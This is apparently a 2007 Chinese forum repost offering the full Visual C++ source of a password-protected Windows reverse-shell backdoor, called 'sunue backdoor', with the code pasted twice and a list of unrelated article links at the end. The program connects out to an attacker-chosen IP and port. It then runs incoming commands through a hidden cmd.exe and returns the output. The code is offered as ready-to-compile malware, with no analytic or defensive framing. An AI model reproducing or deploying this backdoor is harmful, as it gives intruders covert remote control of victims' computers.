来段后门,反弹的,高手略过哈(转自http://forum.darkst.com/read.php?tid=9537)
2007-10-18 13:56
579 查看
VC++6 编译通过,,,,,,,,
// reverse.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include <WINSOCK.H>
#include <stdio.h>
#pragma comment (lib,"ws2_32.lib")
#define PASSSUCCESS "Password success!/n"
#define PASSERROR "Password error./n"
#define BYEBYE "ByeBye!/n"
#define WSAerron WSAGetLastError()
#define erron GetLastError()
VOID WINAPI EXEBackMain (LPVOID s);
//BOOL EXEBackMain (SOCKET sock);
int main (int argc, TCHAR *argv[])
{
SOCKET sock=NULL;
struct sockaddr_in sai;
TCHAR UserPass[20]={0}; //用户设置密码缓冲
TCHAR PassBuf[20]={0}; //接收密码缓冲
TCHAR PassBanner[]="/nPassword:";
TCHAR Banner[]="---------sunue backdoor---------/n";
if (argc!=4)
{
fprintf(stderr,"Code by sunue/n"
"Usage:%s [DestIP] [Port] [Password]/n",argv[0]);
return 0;
}
sai.sin_family=AF_INET;
//判断参数合法性,并填充地址结构
//IP地址不能大于15
if (strlen(argv[1])<=15)
sai.sin_addr.s_addr=inet_addr(argv[1]);
else
{
goto Clean;
}
//端口不能小于0 && 大于65535
if (atoi(argv[2])>0&&atoi(argv[2])<65535)
sai.sin_port=htons(atoi(argv[2]));
else
{
goto Clean;
}
//密码最大16位
if (strlen(argv[3])<=16)
strcpy(UserPass,argv[3]); //复制密码
else
{
goto Clean;
}
while (TRUE)
{
WSADATA wsadata;
BOOL ThreadFlag=FALSE;
DWORD ThreadID=0;
int nRet=0;
nRet=WSAStartup(MAKEWORD(2,2),&wsadata); //初始化
if (nRet)
{
return 0;
}
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (sock==INVALID_SOCKET)
{
goto Clean;
}
nRet=connect(sock,(struct sockaddr*)&sai,sizeof (struct sockaddr));
if (nRet!=SOCKET_ERROR)
{
nRet=send(sock,Banner,sizeof (Banner),0);
if (nRet==SOCKET_ERROR)
{
goto Clean;
}
while (TRUE)
{
nRet=send(sock,PassBanner,sizeof (PassBanner),0);
if (nRet==SOCKET_ERROR)
{
goto Clean;
}
nRet=recv(sock,PassBuf,sizeof (PassBuf)-1,0);
if (strnicmp(PassBuf,UserPass,strlen(UserPass))==0)
{
ThreadFlag=TRUE;
break;
}
else
{
continue;
}
if (nRet==SOCKET_ERROR)
{
goto Clean;
}
Sleep(100);
}
if (ThreadFlag)
{
//EXEBackMain(sock);
CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)EXEBackMain,
(LPVOID)sock,0,&ThreadID);
}
}
Sleep(1000);
}
Clean:
if (sock!=NULL)
closesocket(sock);
WSACleanup();
return 0;
}
VOID WINAPI EXEBackMain (LPVOID s)
//BOOL EXEBackMain (SOCKET sock)
{
SOCKET sock=(SOCKET)s;
STARTUPINFO si;
PROCESS_INFORMATION pi;
HANDLE hRead=NULL,hWrite=NULL;
TCHAR CmdSign[]="/nsunue://>";
while (TRUE)
{
TCHAR MsgError[50]={0}; //错误消息缓冲
TCHAR Cmdline[300]={0}; //命令行缓冲
TCHAR RecvBuf[1024]={0}; //接收缓冲
TCHAR SendBuf[2048]={0}; //发送缓冲
SECURITY_ATTRIBUTES sa;
DWORD bytesRead=0;
int ret=0;
sa.nLength=sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor=NULL;
sa.bInheritHandle=TRUE;
//创建匿名管道
if (!CreatePipe(&hRead,&hWrite,&sa,0))
{
goto Clean;
}
si.cb=sizeof(STARTUPINFO);
GetStartupInfo(&si);
si.hStdError=hWrite;
si.hStdOutput=hWrite; //进程(cmd)的输出写入管道
si.wShowWindow=SW_HIDE;
si.dwFlags=STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
GetSystemDirectory(Cmdline,sizeof (Cmdline)); //获取系统目录
strcat(Cmdline,"//cmd.exe /c "); //拼接cmd
ret=send(sock,CmdSign,sizeof (CmdSign),0); //向目标发送提示符
if (ret==SOCKET_ERROR)
{
goto Clean;
}
ret=recv(sock,RecvBuf,sizeof (RecvBuf),0); //接收目标数据
//如果为exit或quit,就退出
if (strnicmp(RecvBuf,"exit",4)==0||strnicmp(RecvBuf,"quit",4)==0)
{
goto Clean;
}
//表示对方已经断开
if (ret==SOCKET_ERROR)
{
goto Clean;
}
//表示接收数据出错
if (ret<=0)
{
continue;
}
Sleep(100); //休息一下,可要可不要
strncat(Cmdline,RecvBuf,sizeof (RecvBuf)); //拼接一条完整的cmd命令
//创建进程,也就是执行cmd命令
if (!CreateProcess(NULL,Cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi))
{
continue;
}
CloseHandle(hWrite);
while (TRUE)
{
//无限循环读取管道中的数据,直到管道中没有数据为止
if (ReadFile(hRead,SendBuf,sizeof (SendBuf),&bytesRead,NULL)==0)
break;
send(sock,SendBuf,bytesRead,0); //发送出去
memset(SendBuf,0,sizeof (SendBuf)); //缓冲清零
Sleep(100); //休息一下
}
}
Clean:
//释放句柄
if (hRead!=NULL)
CloseHandle(hRead);
if (hWrite!=NULL)
CloseHandle(hWrite);
//释放SOCKET
if (sock!=NULL)
closesocket(sock);
WSACleanup();
ExitThread(0);
//return 0;
}
// reverse.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include <WINSOCK.H>
#include <stdio.h>
#pragma comment (lib,"ws2_32.lib")
#define PASSSUCCESS "Password success!/n"
#define PASSERROR "Password error./n"
#define BYEBYE "ByeBye!/n"
#define WSAerron WSAGetLastError()
#define erron GetLastError()
VOID WINAPI EXEBackMain (LPVOID s);
//BOOL EXEBackMain (SOCKET sock);
int main (int argc, TCHAR *argv[])
{
SOCKET sock=NULL;
struct sockaddr_in sai;
TCHAR UserPass[20]={0}; //用户设置密码缓冲
TCHAR PassBuf[20]={0}; //接收密码缓冲
TCHAR PassBanner[]="/nPassword:";
TCHAR Banner[]="---------sunue backdoor---------/n";
if (argc!=4)
{
fprintf(stderr,"Code by sunue/n"
"Usage:%s [DestIP] [Port] [Password]/n",argv[0]);
return 0;
}
sai.sin_family=AF_INET;
//判断参数合法性,并填充地址结构
//IP地址不能大于15
if (strlen(argv[1])<=15)
sai.sin_addr.s_addr=inet_addr(argv[1]);
else
{
goto Clean;
}
//端口不能小于0 && 大于65535
if (atoi(argv[2])>0&&atoi(argv[2])<65535)
sai.sin_port=htons(atoi(argv[2]));
else
{
goto Clean;
}
//密码最大16位
if (strlen(argv[3])<=16)
strcpy(UserPass,argv[3]); //复制密码
else
{
goto Clean;
}
while (TRUE)
{
WSADATA wsadata;
BOOL ThreadFlag=FALSE;
DWORD ThreadID=0;
int nRet=0;
nRet=WSAStartup(MAKEWORD(2,2),&wsadata); //初始化
if (nRet)
{
return 0;
}
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (sock==INVALID_SOCKET)
{
goto Clean;
}
nRet=connect(sock,(struct sockaddr*)&sai,sizeof (struct sockaddr));
if (nRet!=SOCKET_ERROR)
{
nRet=send(sock,Banner,sizeof (Banner),0);
if (nRet==SOCKET_ERROR)
{
goto Clean;
}
while (TRUE)
{
nRet=send(sock,PassBanner,sizeof (PassBanner),0);
if (nRet==SOCKET_ERROR)
{
goto Clean;
}
nRet=recv(sock,PassBuf,sizeof (PassBuf)-1,0);
if (strnicmp(PassBuf,UserPass,strlen(UserPass))==0)
{
ThreadFlag=TRUE;
break;
}
else
{
continue;
}
if (nRet==SOCKET_ERROR)
{
goto Clean;
}
Sleep(100);
}
if (ThreadFlag)
{
//EXEBackMain(sock);
CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)EXEBackMain,
(LPVOID)sock,0,&ThreadID);
}
}
Sleep(1000);
}
Clean:
if (sock!=NULL)
closesocket(sock);
WSACleanup();
return 0;
}
VOID WINAPI EXEBackMain (LPVOID s)
//BOOL EXEBackMain (SOCKET sock)
{
SOCKET sock=(SOCKET)s;
STARTUPINFO si;
PROCESS_INFORMATION pi;
HANDLE hRead=NULL,hWrite=NULL;
TCHAR CmdSign[]="/nsunue://>";
while (TRUE)
{
TCHAR MsgError[50]={0}; //错误消息缓冲
TCHAR Cmdline[300]={0}; //命令行缓冲
TCHAR RecvBuf[1024]={0}; //接收缓冲
TCHAR SendBuf[2048]={0}; //发送缓冲
SECURITY_ATTRIBUTES sa;
DWORD bytesRead=0;
int ret=0;
sa.nLength=sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor=NULL;
sa.bInheritHandle=TRUE;
//创建匿名管道
if (!CreatePipe(&hRead,&hWrite,&sa,0))
{
goto Clean;
}
si.cb=sizeof(STARTUPINFO);
GetStartupInfo(&si);
si.hStdError=hWrite;
si.hStdOutput=hWrite; //进程(cmd)的输出写入管道
si.wShowWindow=SW_HIDE;
si.dwFlags=STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
GetSystemDirectory(Cmdline,sizeof (Cmdline)); //获取系统目录
strcat(Cmdline,"//cmd.exe /c "); //拼接cmd
ret=send(sock,CmdSign,sizeof (CmdSign),0); //向目标发送提示符
if (ret==SOCKET_ERROR)
{
goto Clean;
}
ret=recv(sock,RecvBuf,sizeof (RecvBuf),0); //接收目标数据
//如果为exit或quit,就退出
if (strnicmp(RecvBuf,"exit",4)==0||strnicmp(RecvBuf,"quit",4)==0)
{
goto Clean;
}
//表示对方已经断开
if (ret==SOCKET_ERROR)
{
goto Clean;
}
//表示接收数据出错
if (ret<=0)
{
continue;
}
Sleep(100); //休息一下,可要可不要
strncat(Cmdline,RecvBuf,sizeof (RecvBuf)); //拼接一条完整的cmd命令
//创建进程,也就是执行cmd命令
if (!CreateProcess(NULL,Cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi))
{
continue;
}
CloseHandle(hWrite);
while (TRUE)
{
//无限循环读取管道中的数据,直到管道中没有数据为止
if (ReadFile(hRead,SendBuf,sizeof (SendBuf),&bytesRead,NULL)==0)
break;
send(sock,SendBuf,bytesRead,0); //发送出去
memset(SendBuf,0,sizeof (SendBuf)); //缓冲清零
Sleep(100); //休息一下
}
}
Clean:
//释放句柄
if (hRead!=NULL)
CloseHandle(hRead);
if (hWrite!=NULL)
CloseHandle(hWrite);
//释放SOCKET
if (sock!=NULL)
closesocket(sock);
WSACleanup();
ExitThread(0);
//return 0;
}
相关文章推荐
- Lnk1202 http://www.codeguru.com/forum/archive/index.php/t-386908.html
- 加速度计的理解 http://www.geek-workshop.com/forum.php?mod=viewthread&tid=1695&highlight=%D6%B8%C4%CF
- http://www.cocoachina.com/bbs/read.php?tid-1323.html
- 收藏常用正则表达式 转自shuguang http://www.osphp.com.cn/read.php/453.htm
- 女孩们 请不要让男生太累 http://www.leelay.com/read.php/55.htm
- 转自(http://bbs.hrqq.com/read.php?tid=15456)
- 摄像头编程大全(源码)(c#) http://tmsoft.lsxy.com/index.php?load=read&id=434
- XSBase255 -linux 启动过程描述 引用自http://www.linuxeden.com/forum/blog/index.php?op=ViewArticle&articleId=230&blogId=102509
- PHP导出MySQL数据库为EXCEL文件格式(.xls)的方法 http://www.kankanblog.com/read.php/144.htm
- Windows下用subversion进行版本控制(转载自http://luhengqi.com/read.php/23.htm)
- 经典的25句话 http://www.leelay.com/read.php/136.htm
- (转载),方便使用http://www.cocoachina.com/bbs/read.php?tid=128244
- ios DOME(http://www.cocoachina.com/bbs/read.php?tid-8101.html)
- 数据挖掘常用算法及实现(http://bbs.chinakdd.com/forum.php?mod=viewthread&tid=4055&extra=page%3D1)
- ORCAD原理图更新到PADS的方法(转帖)(http://www.asmyword.com/forum.php)
- 分享45个android实例源码,很好很强大.收藏吧!!! http://www.apkbus.com/forum.php?mod=viewthread&tid=20978 (出处: Android开
- 我用来分析QQ协议的简单sniffer http://group.qqread.com/viewthread.php?tid=10960
- http://www.eoeandroid.com/forum.php?mod=viewthread&tid=165974
- http://xinsheng.huawei.com/cn/forum/index.php?app=forum&mod=Detail&act=index&id=355911
- http://www.apkbus.com/forum.php?mod=viewthread&tid=19181